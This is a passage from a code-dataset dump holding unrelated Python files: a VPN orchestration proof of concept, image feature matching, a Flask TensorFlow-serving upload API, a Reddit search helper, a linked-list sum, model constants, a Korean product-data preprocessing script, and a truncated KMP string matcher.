main()\n","repo_name":"carrtesy/Graph-WaveNet-WaveBound","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"33953101775","text":"import threading\nimport time\n\nfrom src.main.python.net.i2cat.cnsmo.lib.model.service import Service\n\nfrom src.main.python.net.i2cat.cnsmo.deployment.bash import BashDeployer\nfrom src.main.python.net.i2cat.cnsmo.manager.cnsmo import CNSMOManager\nfrom src.main.python.net.i2cat.cnsmoservices.vpn.manager.vpn import VPNManager\nfrom src.main.python.net.i2cat.cnsmo.factory.system.state.factory import SystemStateFactory\n\n\ndef get_server_app_request():\n \"\"\"\n Main request necessary to create an APP from a service.\n It contains the ID, no resources and no dependencies. The trigger, which is the command to execute this app\n The trigger is quite intrusive, it requires some refactor to make it clearer and easy to use\n :return:\n \"\"\"\n d = dict(service_id=\"server_123\",\n trigger= \"cp /home/oscarcillo/example/server.py /home/CNSMO/ENVS/server_123/server.py && python /home/CNSMO/ENVS/server_123/server.py\",\n resources = [],\n dependencies=[],\n endpoints= [{ \"uri\":\"http://127.0.0.1:9092/server/{param}\",\n \"driver\":\"REST\",\n \"logic\":\"get\",\n \"name\":\"start\"}])\n\n service = Service()\n service.objectify(**d)\n return service\n\n\ndef get_cert_app_request():\n d = dict(service_id=\"cert_123\",\n trigger= \"cp /home/oscarcillo/example/cert.py /home/CNSMO/ENVS/cert_123/cert.py && python cert.py\",\n resources = [],\n dependencies=[],\n endpoints=[{\"uri\":\"http://127.0.0.1:9091/dh/\",\n \"driver\":\"REST\",\n \"logic\":\"get\",\n \"name\":\"get_dh\"}])\n\n\n service = Service()\n service.objectify(**d)\n return service\n\n\ndef main():\n \"\"\"\n This is the second proof of concept of the CYCLONE CNSMO architecture\n The idea is the following:\n :We have a distributed system state, which is actually implmemented.\n :We also have the VPN Manager which is a kind of orchestrator for different services\n :the credentialManager service represents the entity that will provide the config files and stuff\n :The Server is meant to be the service that will deploy the VPN server daemon\n\n the credential and server services are both configured with a basic bash deployer. That means\n that any launched app in that service, will be spawned via bash.\n For simplicity this PoC just launches to python REST servers that only respond with dummy responses.\n :return:\n \"\"\"\n #Configuring the System State Manager, it listen to new services\n system_state = SystemStateFactory.generate_system_state_manager(\"localhost:6379\")\n t = threading.Thread(target=system_state.start)\n t.start()\n time.sleep(1) #Sleeping for synchronization\n\n #The bash deployer to be used by the Server and the credential manager\n bash_deployer = BashDeployer(None)\n\n #Configuring the VPN Orchestrator in a different Thread to make things feel real\n vpn = VPNManager(\"localhost:6379\")\n t2 = threading.Thread(target=vpn.start)\n t2.start()\n time.sleep(1) #Sleeping for synch\n\n #At this point the VPN Manager is advertising himself to the SystemState,\n #There is a Main topic called Discovery.\n #By default the VPN Orchestrator is susbcribed to Client, Server and Credential MAnager Topics\n\n\n #Configuring the Server Manager\n server = CNSMOManager(\"localhost:6379\", \"server_123\", \"Server\", bash_deployer, None)\n\n #Configuring the Credential Manager\n credential = CNSMOManager(\"localhost:6379\", \"cert_123\", \"CredentialManager\", bash_deployer, None)\n\n #Launching the server in another thread to make things feel real\n t3 = threading.Thread(target=server.start)\n t3.start()\n time.sleep(1)\n\n #Launching the credential manager in a different thread to make things feel real\n t4 = threading.Thread(target=credential.start)\n t4.start()\n time.sleep(1)\n\n #Now we simulate that we are composing a server service for the ServerManager\n server.compose_service(**get_server_app_request().dictionarize())\n #...And launch it\n server.launch_service(\"server_123\")\n time.sleep(0.5)# Again, for synch, this is just to help to read the logs in the correct order\n\n\n #Let's compose a service for the credential manager as well\n credential.compose_service(**get_cert_app_request().dictionarize())\n #...And of course, launch it\n credential.launch_service(\"cert_123\")\n\n #We sleep here in order to let the servers spawn correctly...\n time.sleep(0.5)\n #to finally deploy the VPN...\n vpn.deploy()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"dana-i2cat/cnsmo","sub_path":"src/test/python/cnsmo/poc/pocv2.py","file_name":"pocv2.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"12919138957","text":"import torch\nfrom torchvision import transforms\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom .models import get_conv4_model\nfrom os.path import join, splitext, isfile\nfrom os import listdir\nfrom PIL import Image\n\nfrom .ransac import Ransac\n\n\nclass FeatureMatching:\n def __init__(self, model):\n self.strideNet = 16\n self.minNet = 16\n self.base = 20\n self.model = model\n\n def rescale_image(self, I, featMax, featMin=1):\n w, h = I.size\n ratio = float(w) / h\n if ratio < 1:\n feat_h = featMax\n feat_w = max(round(ratio * feat_h), featMin)\n\n else:\n feat_w = featMax\n feat_h = max(round(feat_w / ratio), featMin)\n resize_w = (feat_w - 1) * self.strideNet + self.minNet\n resize_h = (feat_h - 1) * self.strideNet + self.minNet\n\n return resize_w, resize_h\n\n def multi_scale_resize(self, image, feature_sizes):\n images = list()\n for size in feature_sizes:\n w, h = self.rescale_image(image, size)\n images.append(image.resize((w, h)))\n return images\n\n @staticmethod\n def normalize(vec, axis, eta=1e-7, is_tensor=False):\n if is_tensor:\n return vec.div(torch.norm(vec, p=2, dim=axis).detach() + eta)\n else:\n return vec / (np.linalg.norm(vec, ord=2, axis=axis, keepdims=True) + eta)\n\n @staticmethod\n def get_sizes(base, abs_range, step=1, scale_type=\"affine\"):\n if scale_type == \"log\":\n feature_sizes = [int(base * 2 ** (i / abs_range)) for i in range(-abs_range, abs_range + 1, 1)]\n else:\n feature_sizes = [base + step * i for i in range(-abs_range, abs_range + 1, 1)]\n return feature_sizes\n\n @staticmethod\n def get_2d_idx(i, width):\n w = i % width\n h = i // width\n return w, h\n\n def compute_multi_scale_descriptors(self, images, feature_sizes):\n descriptors = list()\n preprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n if torch.cuda.is_available():\n self.model.to('cuda')\n self.model.eval()\n with torch.no_grad():\n print(\"Computing descriptors...\")\n for image in tqdm(images):\n rescaled_images = self.multi_scale_resize(image, feature_sizes)\n cur_features = list()\n for cur_img in rescaled_images:\n inp_tensor = preprocess(cur_img).unsqueeze(0)\n if torch.cuda.is_available():\n inp_tensor = inp_tensor.to('cuda')\n cur_features.append(np.squeeze(self.model(inp_tensor).cpu().numpy(), axis=0))\n descriptors.append(cur_features)\n\n return descriptors\n\n @staticmethod\n def get_feats_tensors(feats1):\n return [torch.from_numpy(feat) for feat in feats1]\n\n @staticmethod\n def compute_mutual_match(feat1, feat2):\n match1 = []\n match2 = []\n similarity = []\n grid_size = []\n\n n_features, feat2H, feat2W = feat2.shape\n _, feat1H, feat1W = feat1.shape\n feat1 = FeatureMatching.normalize(feat1, axis=0, is_tensor=True).permute(1, 2, 0).view(-1, n_features)\n feat2 = FeatureMatching.normalize(feat2, axis=0, is_tensor=True).permute(1, 2, 0).view(-1, n_features)\n score = torch.mm(feat1, feat2.transpose(0, 1))\n topk0_score, topk0_index = score.topk(k=1, dim=0)\n topk1_score, topk1_index = score.topk(k=1, dim=1)\n\n index0 = torch.zeros((score.shape[0], score.shape[1])).scatter_(0, topk0_index,\n topk0_score)\n index1 = torch.zeros((score.shape[0], score.shape[1])).scatter_(1, topk1_index,\n topk1_score)\n\n intersection_score = index0 * index1\n intersection = intersection_score.nonzero()\n\n for i1, i2 in intersection:\n i1 = i1.item()\n i2 = i2.item()\n w1, h1 = FeatureMatching.get_2d_idx(i1, feat1W)\n w2, h2 = FeatureMatching.get_2d_idx(i2, feat2W)\n match1.append([(w1 + 0.5) / feat1W, (h1 + 0.5) / feat1H])\n match2.append([(w2 + 0.5) / feat2W, (h2 + 0.5) / feat2H])\n similarity.append(intersection_score[i1, i2].item() ** 0.5)\n grid_size.append([1. / feat1W, 1. / feat1H])\n return match1, match2, similarity, grid_size\n\n @staticmethod\n def compute_feature_matching(feats1, feat2):\n match1 = []\n match2 = []\n similarity = []\n grid_size = []\n _, feat2_h, feat2_w = feat2.shape\n for feat1 in feats1:\n feat1 = FeatureMatching.normalize(feat1, axis=0, is_tensor=True)\n match1_, match2_, similarity_, grid_size_ = FeatureMatching.compute_mutual_match(feat1, feat2)\n match1 += match1_\n match2 += match2_\n similarity += similarity_\n grid_size += grid_size_\n\n match1 = torch.from_numpy(np.array(match1))\n match2 = torch.from_numpy(np.array(match2))\n similarity = torch.from_numpy(np.array(similarity))\n grid_size = torch.from_numpy(np.array(grid_size))\n\n return match1, match2, similarity, grid_size, feat2_h*feat2_w\n\n\n\n\ndef get_file_extension(file):\n return splitext(file)[1][1:].lower()\n\n\ndef list_folder_images(folder):\n image_types = ['jpg', 'tif', 'png', 'bmp']\n return [join(folder, f) for f in listdir(folder) if (isfile(join(folder, f)) and (get_file_extension(f) in image_types))]\n\n\ndef get_image_list(folder):\n images_path = list_folder_images(folder)\n return [Image.open(image_path).convert('RGB') for image_path in images_path]\n\n\nif __name__ == \"__main__\":\n conv4 = get_conv4_model()\n feature_matching = FeatureMatching(conv4)\n feature_sizes = feature_matching.get_sizes(20, 2)\n\n images1 = get_image_list(\"../tmp_manuscripts/P2_/illustration\")\n images2 = get_image_list(\"../tmp_manuscripts/P4_/illustration\")\n\n descriptors1 = feature_matching.compute_multi_scale_descriptors(images1, feature_sizes)\n descriptors2 = feature_matching.compute_multi_scale_descriptors(images2, feature_sizes)\n feat1 = torch.from_numpy(descriptors1[6][0])\n feats1 = [torch.from_numpy(feat) for feat in descriptors1[6]]\n feat2 = torch.from_numpy(descriptors2[5][0])\n\n #match1, match2, similarity, grid_size = feature_matching.compute_mutual_match(feat1, feat2)\n match1, match2, similarity, grid_size, feature_map_size = feature_matching.compute_feature_matching(feats1, feat2)\n ransac = Ransac()\n score, _ = ransac.get_ransac_score(match1, match2, similarity, grid_size, feature_map_size, tolerance=0.1,\n nb_iter=100,\n transformation_name=\"affine\", nb_max_iter=100)\n exit()","repo_name":"Rykoua/ImageCollation","sub_path":"IllustrationMatcher/utils/feature_matching.py","file_name":"feature_matching.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"34855203939","text":"# Code by omoknooni\n# Tensorflow Serving API\n\nfrom flask import Flask, render_template, request, Response\nfrom werkzeug.utils import secure_filename\nfrom google.cloud import storage\nfrom PIL import Image, ImageOps\n\nimport os\nimport io\nimport json\nimport uuid, traceback\nimport requests\nimport numpy as np\n\napp = Flask(__name__)\napp.config['UPLOAD_DIR'] = '/tmp/'\nTENSOR_URL = 'http://[internal docker network ip]:8501/v1/models/wowboard:predict'\n\nALLOWED_CONTENT_TYPE = {\n 'jpg':'image/jpeg',\n 'jpeg':'image/jpeg',\n 'png':'image/png',\n}\nALLOWED_EXTENSION = sorted(ALLOWED_CONTENT_TYPE.keys())\n\nBUCKET_NAME = 'wowbd-detected-img'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '/app/[gcp storage iam account json file]'\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSION\n\ndef prepare_image(image, target):\n if image.mode != \"RGB\":\n image = image.convert(\"RGB\")\n image = image.resize(target)\n image = np.array(image, dtype=np.uint8)\n return image\n\n\n@app.route('/')\ndef home():\n return Response(json.dumps({'status': 'healthy'}), mimetype='application/json', status=200)\n\n# @app.route('/upload_test')\n# def upload_test():\n# return render_template('upload_test.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n if request.method == \"POST\":\n file_obj = request.files['file']\n TEMP_FILENAME = os.path.join(app.config['UPLOAD_DIR'],secure_filename(file_obj.filename))\n task_id = str(uuid.uuid4())\n dest_name = task_id + os.path.splitext(file_obj.filename)[1]\n file_obj.save(os.path.join(TEMP_FILENAME))\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(BUCKET_NAME)\n blob = bucket.blob(task_id + '/' + dest_name)\n blob.upload_from_filename(TEMP_FILENAME)\n print(f'File {TEMP_FILENAME} uploaded to {dest_name}')\n\n try:\n # preprocessing\n with open(TEMP_FILENAME, 'rb') as f:\n img_data = f.read()\n image = Image.open(io.BytesIO(img_data))\n image = ImageOps.exif_transpose(image)\n image = prepare_image(image, target=(1024,1024)) \n height, width, _ = image.shape\n origin_image = image.copy()\n\n # add axis\n image = image[np.newaxis, :, :]\n\n # detection\n image_data = json.dumps({\"signature_name\": \"serving_default\", \"instances\": image.tolist()})\n res = requests.post(TENSOR_URL, data=image_data)\n\n # extract Result\n result = res.json()[\"predictions\"][0]\n num_detections = int(result[\"num_detections\"])\n\n result['detection_scores'] = np.array(result[\"detection_scores\"], dtype=np.float32)\n result['detection_boxes'] = np.array(result[\"detection_boxes\"], dtype=np.float32)\n\n obj_index = result['detection_scores'] > 0.65\n score = result[\"detection_scores\"][obj_index] # 0.973602414\n boxes = result[\"detection_boxes\"][obj_index] # [0.302173734, 0.617861152, 0.531666338, 0.770464897]\n num_detections = obj_index.tolist().count(True)\n\n for idx, obj in enumerate(boxes):\n obj_image = origin_image[int(obj[0]*height):int(obj[2]*height),int(obj[1]*width):int(obj[3]*width)].copy()\n obj_save = Image.fromarray(obj_image)\n obj_local = os.path.join(app.config['UPLOAD_DIR'], f'obj_{idx}.png')\n obj_save.save(obj_local)\n\n #TODO : extension\n obj_blob = bucket.blob(task_id + '/' + f'obj_{idx}.png')\n obj_blob.upload_from_filename(obj_local)\n\n \n except Exception as e:\n print(traceback.print_exc())\n if res.json:\n return Response(json.dumps({'Error' : 'detection failed', 'traceback': str(res.json())[:50]}), mimetype='application/json', status=500)\n \n if num_detections:\n return Response(json.dumps({'status': 'success', 'task_id': task_id, 'num_detections': num_detections,'score': score.tolist(), 'boxes': boxes.tolist()}), mimetype='application/json', status=200)\n else:\n return Response(json.dumps({'status': 'success', 'task_id': task_id}), mimetype='application/json', status=200)\n else:\n return Response(json.dumps({'Error':'Method not allowed'}), mimetype='application/json', status=405)\n\n\nif __name__ == \"__main__\":\n # Only for debugging while developing\n app.run(host='0.0.0.0', debug=True, port=80)\n","repo_name":"omoknooni/wowboard-detector","sub_path":"serving/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30629795075","text":"import praw\n\ndef authenticate_reddit(credentials):\n reddit = praw.Reddit(\n client_id=credentials['client_id'],\n client_secret=credentials['client_secret'],\n password=credentials['password'],\n user_agent=f\"SemanticForum by u/{credentials['username']}\",\n username=credentials['username']\n )\n return reddit\n\ndef reddit_search(reddit, subreddit_name, query, limit):\n subreddit = reddit.subreddit(subreddit_name)\n\n search_obj = subreddit.search(query=query, sort='hot', time_filter='all')\n \n search_result = []\n for i, submission in enumerate(search_obj):\n if i < limit:\n title = submission.title\n permalink = f'https://reddit.com{submission.permalink}'\n comment_limit = 5 # arbitrary, but allowing more comments is slower and need to deal with MoreComments objects\n comments = [comment.body for comment in submission.comments[:comment_limit]]\n search_result.append({'title': title, 'permalink': permalink, 'comments': comments})\n else: break\n \n return search_result","repo_name":"micahcantor/RedditSemanticSearchFlask","sub_path":"reddit_utils.py","file_name":"reddit_utils.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18335795585","text":"class ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2, remainder=0):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n l3 = None\n current_node = l3\n\n while l1 or l2 or remainder != 0:\n sum_numbers = (l1.val if l1 else 0) + (l2.val if l2 else 0) + remainder\n\n remainder = sum_numbers // 10\n node_value = sum_numbers % 10\n\n new_node = ListNode(node_value)\n\n if not l3:\n l3 = new_node\n current_node = new_node\n else:\n current_node.next = new_node\n current_node = new_node\n\n l1 = (l1.next if l1 else None)\n l2 = (l2.next if l2 else None)\n\n return l3\n\nl1 = ListNode(10, next=ListNode(5))\nl2 = ListNode(10, next=ListNode(5))\n\nsolution = Solution()\nl3 = solution.addTwoNumbers(l1=l1,l2=l2)\n\nprint(l3)\n","repo_name":"mattiasu96/leetcoding-practice","sub_path":"Random problems/2. Add Two Numbers/add_two_numbers_iterative.py","file_name":"add_two_numbers_iterative.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74810068459","text":"from models.ullava import UllavaConfig, UllavaForCausalLM\nfrom models.ullava_core import UllavaCoreConfig, UllavaCoreForCausalLM\nfrom models.grounding_module import load_groundingdino_model, GroundingModule\nfrom models.tools import KeywordsStoppingCriteria, smart_resize_token_embedding, \\\n smart_special_token_and_embedding_resize, multi_modal_resize_token_embedding\n\nDEFAULT_IMG_TOKEN = ''\n\nDEFAULT_IMG_PATCH_TOKEN = \"\"\nDEFAULT_IMG_START_TOKEN = \"\"\nDEFAULT_IMG_END_TOKEN = \"\"\n\nDEFAULT_VID_PATCH_TOKEN = \"\"\nDEFAULT_VID_START_TOKEN = \"\"\nDEFAULT_VID_END_TOKEN = \"\"\n\nDEFAULT_SEG_TOKEN = '[SEG]'\nDEFAULT_TAG_START = '[tag]'\nDEFAULT_TAG_END = '[/tag]'\n\nDEFAULT_BOS_TOKEN = ''\nDEFAULT_EOS_TOKEN = ''\nDEFAULT_UNK_TOKEN = ''\nDEFAULT_PAD_TOKEN = '[PAD]'\nIGNORE_INDEX = -100\n\n\n__all__ = [\n \"UllavaConfig\",\n \"UllavaForCausalLM\",\n \"UllavaCoreConfig\",\n \"UllavaCoreForCausalLM\",\n \"GroundingModule\",\n \"load_groundingdino_model\",\n \"KeywordsStoppingCriteria\",\n \"smart_resize_token_embedding\",\n \"multi_modal_resize_token_embedding\",\n \"smart_special_token_and_embedding_resize\",\n \"DEFAULT_IMG_TOKEN\",\n \"DEFAULT_SEG_TOKEN\",\n \"DEFAULT_IMG_PATCH_TOKEN\",\n \"DEFAULT_IMG_START_TOKEN\",\n \"DEFAULT_IMG_END_TOKEN\",\n \"DEFAULT_VID_PATCH_TOKEN\",\n \"DEFAULT_VID_START_TOKEN\",\n \"DEFAULT_VID_END_TOKEN\",\n \"DEFAULT_BOS_TOKEN\",\n \"DEFAULT_EOS_TOKEN\",\n \"DEFAULT_UNK_TOKEN\",\n \"DEFAULT_PAD_TOKEN\",\n \"IGNORE_INDEX\",\n \"DEFAULT_TAG_START\",\n \"DEFAULT_TAG_END\"\n]\n\n\n\n","repo_name":"VeritasXu/u-LLaVA","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12455611751","text":"import re\nimport numpy as np\nimport pandas as pd\nimport time\nfrom tqdm import tqdm\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom pymongo import MongoClient\n\nconnection_url = ''\nconnection = MongoClient(connection_url)\n\ndb = connection.get_database('')\ncollection = db.get_collection('')\n\ncursor = collection.find()\nlist_c = list(cursor)\n\ndanawa_data = pd.DataFrame(list_c)\ndanawa_data.info()\n\n\n\n# 리뷰 데이터 제거\ndanawa_data = danawa_data.drop(danawa_data.iloc[:, [17,18,19]].columns, axis=1)\n\n# null값을 제거한 데이터프레임\ndanawa_notnull_data = danawa_data.dropna(axis=0)\ndanawa_notnull_data.info()\n\n# 전체 size의 값이 없는 데이터 제거(51개)\ndanawa_size_drop_data = danawa_notnull_data.loc[danawa_notnull_data['size'].notnull()]\ndanawa_size_drop_data.reset_index(inplace=True, drop=True)\ndanawa_size_drop_data.info()\n\n# 수납칸수 수치형으로 변환\ndanawa_size_drop_data['closet']\n\n# closet 수납칸수를 int형으로 바꾸는 함수(수납칸수가 없는경우는 0)\ndef change_closet_int(data):\n if not data:\n closet_int = 0\n elif '~' in data:\n closet_int = data.lstrip('~').rstrip('칸')\n else:\n closet_int = data.rstrip('칸')\n return int(closet_int)\ndanawa_size_drop_data['int_closet'] = [change_closet_int(i) for i in danawa_size_drop_data['closet']]\ndanawa_size_drop_data.info()\n\n\n# size변수를 를 각각 하나로 변경 \n\n# cm없애는 함수\ndef del_cm(data):\n size = data.rstrip('cm')\n return size\n\n# 잘못된 수집으로 인한 한글제거\ndef del_hangul(data): \n remove_in = '\\(.*\\)'\n hangul = '[:/\\[\\]\\(\\)가-힣+]'\n result = re.sub(remove_in, '', data) \n result = re.sub(hangul, '', result)\n return result.strip()\n\n# 범위로 주어진 사이즈를 범위의 가장 큰 부분으로 대체하는 함수\ndef del_range(lst):\n if lst[lst.find('~')+1] == 'x':\n lst = lst[:lst.find('~')] + lst[lst.find('~')+1:]\n else:\n lst = lst\n if '~' in lst:\n if 'x' in lst[:lst.find('~')+1]:\n range1 = lst[lst.find('x', lst.find('x')+2)+1:lst.find('~')+1]\n else:\n range1 = lst[:lst.find('~')+1]\n \n result = re.sub(range1, '', lst)\n else:\n result = lst\n \n return result\n\n# 가로*세로*높이를 각각 나누는 함수\ndef divide_size(data):\n if 'x' in data:\n division = data.split('x')\n elif '×' in data:\n division = data.split('×')\n \n return division\n\n# 사이즈를 하나의 값들로 나누는 함수\ndef divide_size2(data):\n global data2\n if 'x' in data:\n data2 = data.replace('x', ' ')\n elif '×' in data:\n data2 = data.replace('×', ' ')\n data3 = ' '.join(data2.split()).split()\n return data3\n\n# 각각의 값을 구하는 함수\ndef get_har_size(data):\n har = float(data[0])\n return har\n\ndef get_ver_size(data):\n ver = float(data[1])\n return ver\n\ndef get_hei_size(data):\n if len(data) != 2:\n hei = float(data[2])\n else:\n hei = np.nan\n return hei\n\ndanawa_size_drop_data['modified_size'] = [divide_size2(del_range(del_hangul(del_cm(i)))) for i in danawa_size_drop_data['size']]\nlist(danawa_size_drop_data['modified_size'])\n\ndanawa_size_drop_data['size_har'] = [get_har_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data['size_ver'] = [get_ver_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data['size_hei'] = [get_hei_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data.info()\n\n# 6개월 가격추이의 값이 존재하지 않는 3개의 데이터를 제거\ndanawa_data2 = danawa_size_drop_data.loc[danawa_size_drop_data['price_6month'].notnull()]\ndanawa_data2.info()\n\n\n# 기울기\n\n# y = 최근 minPrice - 과거 minPrice, x = 6(관측된 최근의 개월) - 1(첫달), 기울기 = y/x \n# x1 = 1, \n# x2 = len(가격추이), 만약 1이��면 기울기=0 \n# y2 = len(가격추이)의 minPrice \n# y1 = 1의 minPrice \n\n# 기울기를 가져오는 함수\ndef get_slope(x1, x2, y1, y2):\n if x2 == 1:\n result = 0\n else:\n result = (y2-y1) / (x2-x1)\n return result\n\ndef get_price_slope(data):\n x1 = 1\n x2 = len(data)\n y2 = data[x2-1].get('minPrice')\n y1 = data[0].get('minPrice')\n \n result = get_slope(x1,x2,y1,y2)\n return result\n\nget_price_slope(danawa_data2['price_6month'][0])\ndanawa_data2['price_slope'] = [get_price_slope(lst) for lst in danawa_data2['price_6month']]\n\n\n\n\n\n# 토크나이저를 통해 json값으로 돌려주는 함수\ndef get_token_json(data):\n text = data\n import requests as req\n import json\n url = ''\n body = {\n \"text\" : text,\n \"analyzer\": \"nori_korean_analyzer\",\n # \"explain\": True\n }\n headers = {\n 'Content-Type': 'application/json; charset=utf-8'\n }\n noun = req.post(url, json.dumps(body), headers = headers)\n \n return noun.json()\n\n# 데이터의 하나의 컬럼을 넣었을 때, 하나의 값당 토크나이저를 돌리고 그를 공백값으로 join해서 내보내주는 함수\ndef get_token_df(data):\n json_data = [get_token_json(i) for i in data]\n tokens_data = [i.get('tokens') for i in json_data]\n \n token_df = pd.DataFrame(columns=['data'])\n for q in range(len(tokens_data)):\n token_one = [i.get('token') for i in tokens_data[q]]\n token_df = token_df.append({'data':' '.join(token_one)}, ignore_index=True)\n final = [i.split(' ') for i in token_df['data']]\n return final\n\n\n\n# token화가 필요한 변수(info_all, with_in, form, color, function) 수정 \n# with_in 수정\ndanawa_data2['with_in'] = get_token_df(danawa_data2['with_in'])\ndanawa_data2['with_in']\n\n# form 수정\ndanawa_data2['form'] = [i.strip('형') for i in danawa_data2['form']]\n\n# color 수정\ndanawa_data2['color'] = get_token_df(danawa_data2['color'])\ndanawa_data2['color']\n\n# function 수정\ndanawa_data2['function'] = get_token_df(danawa_data2['function'])\ndanawa_data2['function']\n\n# info_all 수정\ndanawa_data2['info_all'] = get_token_df(danawa_data2['info_all'])\ndanawa_data2['info_all']\n\n\n# 화장대의 특성중 하나인 레일의 종류가 토크나이저로 인해 특성을 무시하고 '레일'만 남는다는 사실을 발견!! \n# -> 이부분에 대해 '레일'을 제거하고 '볼'을 남기는 방법을 택함 \n# ('볼 레일' 이런식으로 띄워도 '레일'만 인식됨)\nget_token_json(['볼', '레일'])\nget_token_json(['볼레일'])\n\n# function의 '볼레일' 수정\na = [' '.join(i).replace('레일', '') if '레일' in ' '.join(i) else i for i in danawa_data2['function']]\nb = [i.replace('레일', '') if '레일' in i else i for i in a]\nlen(b)\ndanawa_data2['function'] = get_token_df(b)\n\n# info_all의 '볼레일' 수정\na = [' '.join(i).replace('레일', \"'/ 레일\") if '레일' in ' '.join(i) else i for i in danawa_data2['info_all']]\nb = [i.replace('레일', \"'/ 레일\") if '레일' in i else i for i in a]\nlen(b)\ndanawa_data2['info_all'] = get_token_df(b)\n\n\n# 이 토큰들을 하나의 벡터로 만드는 작업\npath = './word2vec/word2vec_210813.bin'\nfrom gensim.models import Word2Vec\nmodels = Word2Vec.load(path)\n\n# token화 처리한 4개의 변수에 대해서 벡터화\nform_vector = [np.mean(models.wv[i]) for i in danawa_data2['form']]\nlen(form_vector)\n\nwith_in_vector = [np.mean(models.wv[i]) for i in danawa_data2['with_in']]\nlen(with_in_vector)\n\ncolor_vector = [np.mean(models.wv[i]) for i in danawa_data2['color']]\nlen(color_vector)\n\nfunction_vector = [np.mean(models.wv[i]) for i in danawa_data2['function']]\nlen(function_vector)\n\nfor i in danawa_data2['info_all']:\n for j in i:\n if j not in models.wv.index_to_key:\n i.remove(j)\ninfo_all_vector = [np.mean(models.wv[i]) for i in danawa_data2['info_all']]\nlen(info_all_vector)\n\n# 제조사의 경우, word2vec에서 인식하지 못하는 글자가 많고, 다르다는 구분만 존재해도 된다 생각하여 정수 인코딩 실시\nmade_by = dict(zip(list(danawa_data2.iloc[:,7].unique()), \n list(range(len(danawa_data2.iloc[:,7].unique())))))\n\n# 데이터에 추가\ndanawa_data3 = danawa_data2.copy()\n\ndanawa_data3['made_by'] = [made_by.get(i) for i in danawa_data2['made_by']]\ndanawa_data3['form'] = form_vector\ndanawa_data3['with_in'] = with_in_vector\ndanawa_data3['color'] = color_vector\ndanawa_data3['function'] = function_vector\ndanawa_data3['info_all'] = info_all_vector\ndanawa_data3.info()\n\n\n\n# 가격이 존재하지 않는 데이터(주로 일시품절로 인해 가격정보가 없음)를 제거후, 최저가를 뽑아내 변수를 하나 만듦\ndanawa_data4 = danawa_data3.loc[danawa_data3['shoppingmall_price'] != {}]\ndanawa_data4.reset_index(inplace=True, drop=True)\ndanawa_data4.info()\n\n# 최저가를 뽑아내는 함수\ndef get_min_price(data):\n value_list = list(data.values())\n price = min(value_list)\n return price\n\n\n# 최저가 변수를 넣고, 등록일자를 수치형으로 변환하여 넣음\ndanawa_data4['min_price'] = [get_min_price(i) for i in danawa_data4['shoppingmall_price']]\ndanawa_data4['register_date'] = [int(i.replace('.', '')) for i in danawa_data4['regisgter_date']]\n\n# 모든 변수를 포함한 최종 데이터셋\ndanawa_final_all_data = danawa_data4.copy()\ndanawa_final_all_data.info()\n\n# 필요한 변수만 추려낸 최종데이터셋\ndanawa_final_data = danawa_data4.drop(danawa_data4.iloc[:, [0,1,2,3,4,5,6,9,10,11,12,13,14,15,16,18]].columns, axis=1)\ndanawa_final_data.info()\n\n# 군집에 필요없는 변수 제거하고 최종 데이터셋\ndanawa_drop_data = danawa_data4.drop(danawa_data4.iloc[:, [0,1,2,3,4,5,6,8,9,14,15,16,18]].columns, axis=1)\ndanawa_drop_data.info()\n\n\n","repo_name":"woonooo/danawa_scarapy_project","sub_path":"04.data_preprocessing.py","file_name":"04.data_preprocessing.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11411547424","text":"import random\nimport string\n\n\ndef simple_match(target, pattern):\n assert type(target) is str and type(pattern) is str, 'wrong type'\n target_len = len(target)\n pattern_len = len(pattern)\n\n for i in range(target_len-pattern_len+1):\n position = i\n for j in range(pattern_len):\n if target[i+j] != pattern[j]:\n position = -1\n break\n if position >= 0: # 找到了对应子串\n return position+1\n\n\ndef build_next_list(pattern):\n assert type(pattern) is str, 'wrong type'\n next = [-1, 0]\n for i in range(1, len(pattern)):\n if pattern[i] == pattern[next[i]]:\n next.append(next[i]+1)\n else:\n index = next[i]\n while index != 0: # 不断分割,尝试匹配\n if pattern[i] == pattern[next[index]]:\n next.append(next[index]+1)\n break\n else:\n index = next[index]\n if index == 0: # 已没有能匹配的部分\n next.append(0)\n return next\n\n\ndef KMP(target, pattern):\n assert type(target) is str and type(pattern) is str, 'wrong type'\n next = build_next_list(pattern) # 构建next数组\n index = j = 0\n while len(pattern)+index <= len(target):\n for i in range(j, len(pattern)):\n if pattern[i] != target[index+i]:\n index += i 